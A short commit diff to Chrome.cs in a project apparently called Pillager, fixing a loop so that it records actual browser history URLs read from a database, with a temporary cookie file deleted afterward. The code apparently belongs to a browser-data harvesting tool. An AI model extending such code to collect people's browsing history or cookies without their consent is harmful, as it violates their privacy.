Update Chrome.cs

This commit is contained in:
qwqdanchun 2023-04-29 21:13:29 +08:00
parent 7562b90513
commit 2376b54c2b
1 changed files with 1 additions and 1 deletions

View File

@ -140,7 +140,7 @@ namespace Pillager.Browsers
for (int i = 0; i < handler.GetRowCount(); i++)
{
string url = handler.GetValue(i, "url");
history.AppendLine("url");
history.AppendLine(url);
}
File.Delete(cookie_tempFile);
}